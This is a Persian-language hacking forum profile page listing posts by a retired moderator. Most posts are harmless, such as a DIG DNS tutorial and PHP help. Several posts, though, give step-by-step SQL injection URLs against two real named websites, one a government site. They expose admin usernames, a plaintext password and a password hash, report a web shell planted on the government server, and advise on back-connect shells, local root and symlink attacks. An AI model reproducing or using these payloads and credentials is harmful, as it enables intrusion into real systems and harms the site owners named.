LordBlack

مدير بازنشسته
  • تعداد ارسال ها

    312
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    17

آخرین بار برد LordBlack در دی 9

LordBlack یکی از رکورد داران بیشترین تعداد پسند مطالب است!

درباره LordBlack

  • درجه
    P0!s0nC0d3

Profile Information

  • جنسیت
    Not Telling

آخرین بازدید کنندگان نمایه

1,767 بازدید کننده نمایه
  1. LordBlack

    الان شما سوال پرسیدید یا این برنامه رو نوشتید ؟ چون چیزی پیوست نشده اگر نوشتید هرچه سریعتر پیوست کنید و نحوه ی کار رو هم توضیح دهید... اسپم ها حذف خواهند شد اگر هم سوال پرسیدید این لینک میتونه به شما کمک کنه https://null-byte.wonderhowto.com/how-to/reverse-shell-using-python-0163875/
  2. LordBlack

    فرض رو بر این میگیریم که من اشتباه کردم و تعاریف شما درست میخام یک مثال بزنید تا این بحث بیشتر برای من جا بیفته شما میگین که از شیوه رمز گذاری نامتقارن استفاده شده خب در رمزنگاری نامتقارن یک کلید عمومی داریم و یک کلید خصوصی حالا یک مثال ساده بزنید یک متن ساده رو با رمزنگاری نامتقارن به الگورتیم MD5 تبدیل کنید و دوباره همون متن رو با رمزنگاری نامتقارن به متن ساده تبدیل کنید تشکر
  3. LordBlack

    تولید هش یک فرآیند یک طرفه است عزیز نه دو طرفه فرآیندهای دوطرفه مربوط میشه به الگوریتم های رمزنگاری نه الگوریتم تولید هش میشه کلید عمومی و خصوصی این چیزی که گفتید رو مشخص کنید ؟
  4. LordBlack

    بله میشه روش های مختلفی هست جستجو کنید به نتیجه میرسید. باگ آپلود فایل یا (Remote File Upload (RFU با باگ های (Inclution Attack (RFI , LFI , LFD که مربوط به فراخوانی و دانلود فایل های درون سرور هستش فرق میکنه
  5. LordBlack

    اگه یه کم دقت کنید بد نیست همه چیز رو که نباید گفت. این ارور مربوط میشه به سشن ها که تابع ession_register() از نسخه ی ۵٫۴ به بعد به دلایل امنیتی حذف شده متاسفانه سایت ارور میده و نمیشه ورژن php رو مشاهده کرد. در ورژن های ۵٫۴ به بعد باید از $_SESSION به جای ession_register() استفاده کرد. برای استفاده از ession_register() در نسخه ی های پایین تر باید دستور register_globals در php فعال باشد. موفق باشید.
  6. LordBlack

    تمامی سایت ها یا بهتر بگم یوزر اکانت هایی که تعریف میشن معمولا در مسیر home/ قرار دارند مسلما شما نمیتونید به تمام سایت های یک سرور دسترسی پیدا کنید مگر اینکه دسترسی روت داشته باشید. اینکه میفرمایید با weevely بک کانکت گرفته اید ولی نمیتوانید لوکال روت را اجرا کنید حتما در اجرای لوکال روت مشکل دارید چون بک کانکت گیری صرفا برای دسترسی به محیط کامندی است. بهترین روش برای بک کانکت گرفتن استفاده از ای پی ولید هست و پیشنهاد میشه یک سرور مجازی (لینوکس یا ویندوز) تهیه کنید. از طریق isp که اینترنت تهیه کرده اید هم میتوانید اقدام کنید. دستور etc/passwd/ برای بیرون کشیدن لیست یوزرهای روی سرور به کار میره و درواقع چیزی رو بایپس نمیکنه این دستور بیشتر برای سیملینک زدن به کار میره که از طریق خود شل هم میشه اقدام به این کار کرد اگر اسکریپت پرل شما یا هر اسکریپت دیگری که حالت دانلودی به جای اجرا داشت باید از دستورات htaccess استفاده کنید. آموزش های زیادی در سایت وجود داره موفق باشید.
  7. LordBlack

    در step چهارم username و password که مشخص ! UserName : admin Password : rightway@qatar
  8. LordBlack

    http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6--+ http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6--+ www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6--+ http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(0x3c666f6e7420636f6c6f723d7265643e,str_admin_user_name,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,str_admin_password,0x3c2f666f6e743e)+FROM+tbl_admin),3,4,5,6--+ ادمین پیج : http://www.rightwaycargo.com/webadmin/index.php
  9. LordBlack

    باید از اون سایت دسترسی داشته باشی تا بتونی به محتویات هاست دسترسی پیدا کنی و با استفاده از شل یا ابزارهایی دیگه که با زبان های پرل یا پایتون نوشته شده اند میتونی به دیتابیس دسترسی پیدا کنی کار سختی نیست یه نکته رو بگم هک سرور لازم نیست یعنی برای این کار دسترسی روت لازم نیست فکر نکنم نیازی به توضیح بیشتری باشه . لطفا جواب های قبلی رو مطالعه کنید و این بحث ادامه ندهید چون باعث حذف تاپیک خواهد شد. موفق باشید.
  10. LordBlack

    برنامه های زیادی هست پیشنهاد میکنم از برنامه IObit Uninstaller استفاده کنی موفق باشی
  11. LordBlack

    سلام دوست عزیز این تارگت، تارگت راحتی و کار خاصی نداره مراحل رو یکی یکی به دقت نگاه کن : step 1 http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11--+ : step 2 http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,group_concat(table_name),11+from+information_schema.tables+where+table_schema=database()--+ : step 3 http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,group_concat(user_name,0x3c62723e,password),11+from+user_login--+ استفاده از روش سریعتر : step 1 http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c666f6e7420636f6c6f723d626c75653e,table_name,0x3c2f666f6e743e,' > ',0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x),11--+ : step 2 http://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e3c63656e7465723e496e6a65637465642042792050302173306e43306433203c2f63656e7465723e3c2f666f6e743e3c62723e,(select (@) from (select(@:=0x00),(select (@) from (user_login) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c62723e,0x3c623e,0x3c666f6e7420636f6c6f723d7265643e,0x557365726e616d65203a20,0x3c2f623e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,user_name, 0x3c62723e,0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x50617373776f7264203a20,0x3c2f623e,0x3c2f666f6e743e,password))))x),11-- خب تا اینجای کار Username : media Password : d033e22ae348aeb5660fc2140aec35850c4da997 : Admin Page https://arazi.gov.af/login.php یه نکته رو بگم این پسورد با استفاده از الگوریتم SHA1 هش شده که اگر Decrypt بشه معادل admin به دست میاد که درواقع admin رمز عبور نیست باید پسورد رو به صورت Hash شده وارد کنید. در آخر هم یک شل براتون آپلود کردم https://arazi.gov.af/img/ALFAV2.php موفق باشید.
  12. LordBlack

    ابتدا مدل مودم رو بگو تا بشه راهنمایی کرد تو مودم های tp-link در قسمت Forwarding > Virtual Servers تو مودم های D-link هم در قمست advanced
  13. LordBlack

    ابزار Domain Information Groper) DIG) یک ابزار برای پرس و جوی سرورهای DNS، شناسایی و و دریافت اطلاعات از آدرس های IP و سرورهای ایمیل و رفع مشکلات DNS است. برخی از ویژگی های ابزار DIG : میتوان از این ابزار در حالت کامندی یا batch mode استفاده کرد. از اتصال دامنه بین المللی (IDN) پشتیبانی می کند. DIG پیشرفته تر از سایر ابزارهای قدیمی مانند دستور host و nslookup است. DIG اطلاعات بیشتری نسبت به ابزارهای دیگر فراهم می کند. این ابزار یک ابزار کاربردی در BIND است. "BIND یک DNS سرور متن باز برای راه اندازی سرویس های Name Resolution یا تبدیل اسم به IP و برعکس است". BIND بر روی هر سیستم عاملی قابل نصب و اجراست در این مقاله ما BIND را در ویندوز نصب میکنیم و در آخر تعدادی از دستورات پرکاربرد DIG را معرفی میکنیم. برای نصب BIND ابتدا به آدرس http://www.isc.org/downloads/ رفته و ورژن مورد نظر را دانلود کنید نسخه ی استفاده شده در این مقاله BIND9.12.2.x64_2 است. بعد از دانلود اقدام به نصب BIND میکنیم در حالت Administrator فایل BINDInstall.exe را اجرا کنید و فقط گزینه ی Tools only را انتخاب کنید و در آخر مسیر نصب را مشخص کنید . بعد از نصب مسیر DIG را به متغیر PATHS سیستم اضافه کنید : کار نصب برنامه به اتمام رسید است در آخر برای تست دستور dig را در cmd اجرا میکنیم : در ادامه ی کار چندین دستور پرکاربرد DIG را معرفی میکنیم . 1- استفاده از گزینه های راهنما : با استفاده از گزینه ی dig -h میتوان لیست سوییچ های موجود و مورد استفاده را مشاهده کرد و همچنین با استفاده از dig -v ورژن استفاده شده را نمایش داد. 2- جستجوی پیشفرض نام دامنه : با استفاده از دستور <dig <domain میتوان آدرس IP دامنه مورد نظر را به دست آورد تحلیل نتیجه ی به دست آمده : اگر به خروجی بالا دقت کنید میبینید که دستور dig شامل دو بخش QUESTION SECTION و ANSWER SECTION است قسمت QUESTION SECTION که نوع درخواست ما که type یا متد آن A به معنی Address record است و همچنین کلاس IN که مخفف internet است را نمایش میدهد قسمت ANSWER SECTION پاسخی که از سرور DNS دریافت کرده ایم که همان آدرس IP است را نمایش میدهد. در آخر هم زمان پرس جو، سرور مورد استتفاده ، تاریخ، زمان و حجم پیام دریافتی را نمایش میدهد. 3- تنظیم اختصاصی سرور DNS : در حالت عادی پرس جوی انجام شده از DNS سرور پیشفرض انجام میگیرد که در بعضی موارد ممکن است مفید نباشد اما اگر بخواهیم از DNS سرور اختصاصی استفاده کنیم کافی است علامت @ برای تعیین DNS سرور مورد نظر را قرار دهیم dig @8.8.8.8 <domain> توجه داشته باشید وقتی از سرور های خارجی برای پرس و جو استفاده می کنیم، شبکه ما باید اجازه دسترسی خروجی به این مقصد در پورت 53 را داشته باشد، در غیر این صورت پرس و جو از بین خواهد رفت. 4- مشخص کردن نوع رکورد تا کنون به طور پیش فرض از رکورد A استفاده کردیم ، با این حال ما می تونیم هر رکورد دیگری که قادر به پرس و جو باشیم را در انتهای پرس و جو، مشخص کنیم. در این مثال، ما رکوردMail server) MX) را جستجو می کنیم. dig @8.8.8.8 guardiran.org MX 5- ترجمه معکوس نام دامنه با استفاده از دستور DIG ما می توانیم یک آدرس IP را جستجو کنیم و نام دامنه ای که آن را با پرس و جو از رکورد PTR نشان می دهد پیدا کنیم. این کار با استفاده از گزینه -x و سپس آدرس IP برای پرس و جو انجام می شود. در مثال زیر ما یک جستجوی معکوس را بر روی آدرس IP سایت گاردایران انجام می دهیم dig -x 138.201.41.253 6- خلاصه کردن نتایج خروجی با اضافه کردن سوییچ short+ تنها نتیجه ای که میخواهیم را نمایش میدهد dig -x 138.201.41.253 +short 7- ردیابی مسیر DNS با اضافه کردن سوییچ trace+ میتوان مسیر جستجوی DNS را با استفاده از سرور های نام ریشه ردیابی کرد. dig guardiran.org +trace 8- اجرای لیستی از اسامی دامنه اگر تمایل به اجرای دسته جمعی دامنه های خورد دارید میتوان یک لیست از دامنه ها را از یک فایل با پسوند .txt (یک دامنه در هر خط) استخراج کرد. در اینجا ما سه دامنه را در فایل query.txt قرار داده ایم و با استفاده از سوییچ f- فایل را به ابزار dig میدهیم. dig -f query.txt +short 9- مشخص کردن شماره پورت به طور پیشفرض پورت 53 پورت استاندارد DNS است. اگر به هردلیلی تنظیمات پیکربندی یک سرور برای پرس و جوی DNS از یک پورت دیگر استفاده کند مثلا 5300 میتوان با استفاده از سوییچ p- یک پرس و جو DNS را با استفاده از این پورت انجام داد dig @8.8.8.8 -p 5300 guardiran.org 10- سفارشی کردن نتایج خروجی با استفاده از سوییچ noall+ میتوان تمام نتایج را پنهان کرد dig guardiran.org +noall استفاده از سوییچ answer+ فقط نتیجه اصلی را به ما نمایش میدهد dig guardiran.org +noall +answer و همچنین سوییج stats+ فقط آمار و ارقام را نمایش میدهد dig guardiran.org +noall +stats 11- نمایش تمام رکورد های DNS با استفاده از گزینه ANY میتوان تمام رکوردهای DNS را مشاهده کرد dig guardiran.org ANY موفق باشید.
  14. LordBlack

    معرفی ابزار DIG

    ابزار Domain Information Groper) DIG) یک ابزار برای پرس و جوی سرورهای DNS، شناسایی و و دریافت اطلاعات از آدرس های IP و سرورهای ایمیل و رفع مشکلات DNS است. برخی از ویژگی های ابزار DIG : میتوان از این ابزار در حالت کامندی یا batch mode استفاده کرد. از اتصال دامنه بین المللی (IDN) پشتیبانی می کند. DIG پیشرفته تر از سایر ابزارهای قدیمی مانند دستور host و nslookup است. DIG اطلاعات بیشتری نسبت به ابزارهای دیگر فراهم می کند. این ابزار یک ابزار کاربردی در BIND است. "BIND یک DNS سرور متن باز برای راه اندازی سرویس های Name Resolution یا تبدیل اسم به IP و برعکس است". BIND بر روی هر سیستم عاملی قابل نصب و اجراست در این مقاله ما BIND را در ویندوز نصب میکنیم و در آخر تعدادی از دستورات پرکاربرد DIG را معرفی میکنیم. برای نصب BIND ابتدا به آدرس http://www.isc.org/downloads/ رفته و ورژن مورد نظر را دانلود کنید نسخه ی استفاده شده در این مقاله BIND9.12.2.x64_2 است. بعد از دانلود اقدام به نصب BIND میکنیم در حالت Administrator فایل BINDInstall.exe را اجرا کنید و فقط گزینه ی Tools only را انتخاب کنید و در آخر مسیر نصب را مشخص کنید . بعد از نصب مسیر DIG را به متغیر PATHS سیستم اضافه کنید : کار نصب برنامه به اتمام رسید است در آخر برای تست دستور dig را در cmd اجرا میکنیم : در ادامه ی کار چندین دستور پرکاربرد DIG را معرفی میکنیم . 1- استفاده از گزینه های راهنما : با استفاده از گزینه ی dig -h میتوان لیست سوییچ های موجود و مورد استفاده را مشاهده کرد و همچنین با استفاده از dig -v ورژن استفاده شده را نمایش داد. 2- جستجوی پیشفرض نام دامنه : با استفاده از دستور <dig <domain میتوان آدرس IP دامنه مورد نظر را به دست آورد تحلیل نتیجه ی به دست آمده : اگر به خروجی بالا دقت کنید میبینید که دستور dig شامل دو بخش QUESTION SECTION و ANSWER SECTION است قسمت QUESTION SECTION که نوع درخواست ما که type یا متد آن A به معنی Address record است و همچنین کلاس IN که مخفف internet است را نمایش میدهد قسمت ANSWER SECTION پاسخی که از سرور DNS دریافت کرده ایم که همان آدرس IP است را نمایش میدهد. در آخر هم زمان پرس جو، سرور مورد استتفاده ، تاریخ، زمان و حجم پیام دریافتی را نمایش میدهد. 3- تنظیم اختصاصی سرور DNS : در حالت عادی پرس جوی انجام شده از DNS سرور پیشفرض انجام میگیرد که در بعضی موارد ممکن است مفید نباشد اما اگر بخواهیم از DNS سرور اختصاصی استفاده کنیم کافی است علامت @ برای تعیین DNS سرور مورد نظر را قرار دهیم <dig @8.8.8.8 <domain توجه داشته باشید وقتی از سرور های خارجی برای پرس و جو استفاده می کنیم، شبکه ما باید اجازه دسترسی خروجی به این مقصد در پورت 53 را داشته باشد، در غیر این صورت پرس و جو از بین خواهد رفت. 4- مشخص کردن نوع رکورد تا کنون به طور پیش فرض از رکورد A استفاده کردیم ، با این حال ما می تونیم هر رکورد دیگری که قادر به پرس و جو باشیم را در انتهای پرس و جو، مشخص کنیم. در این مثال، ما رکوردMail server) MX) را جستجو می کنیم. dig @8.8.8.8 guardiran.org MX 5- ترجمه معکوس نام دامنه با استفاده از دستور DIG ما می توانیم یک آدرس IP را جستجو کنیم و نام دامنه ای که آن را با پرس و جو از رکورد PTR نشان می دهد پیدا کنیم. این کار با استفاده از گزینه -x و سپس آدرس IP برای پرس و جو انجام می شود. در مثال زیر ما یک جستجوی معکوس را بر روی آدرس IP سایت گاردایران انجام می دهیم dig -x 138.201.41.253 6- خلاصه کردن نتایج خروجی با اضافه کردن سوییچ short+ تنها نتیجه ای که میخواهیم را نمایش میدهد dig -x 138.201.41.253 +short 7- ردیابی مسیر DNS با اضافه کردن سوییچ trace+ میتوان مسیر جستجوی DNS را با استفاده از سرور های نام ریشه ردیابی کرد. dig guardiran.org +trace 8- اجرای لیستی از اسامی دامنه اگر تمایل به اجرای دسته جمعی دامنه های خورد دارید میتوان یک لیست از دامنه ها را از یک فایل با پسوند .txt (یک دامنه در هر خط) استخراج کرد. در اینجا ما سه دامنه را در فایل query.txt قرار داده ایم و با استفاده از سوییچ f- فایل را به ابزار dig میدهیم. dig -f query.txt +short 9- مشخص کردن شماره پورت به طور پیشفرض پورت 53 پورت استاندارد DNS است. اگر به هردلیلی تنظیمات پیکربندی یک سرور برای پرس و جوی DNS از یک پورت دیگر استفاده کند مثلا 5300 میتوان با استفاده از سوییچ p- یک پرس و جو DNS را با استفاده از این پورت انجام داد dig @8.8.8.8 -p 5300 guardiran.org 10- سفارشی کردن نتایج خروجی با استفاده از سوییچ noall+ میتوان تمام نتایج را پنهان کرد dig guardiran.org +noall استفاده از سوییچ answer+ فقط نتیجه اصلی را به ما نمایش میدهد dig guardiran.org +noall +answer و همچنین سوییج stats+ فقط آمار و ارقام را نمایش میدهد dig guardiran.org +noall +stats 11- نمایش تمام رکورد های DNS با استفاده از گزینه ANY میتوان تمام رکوردهای DNS را مشاهده کرد dig guardiran.org ANY موفق باشید.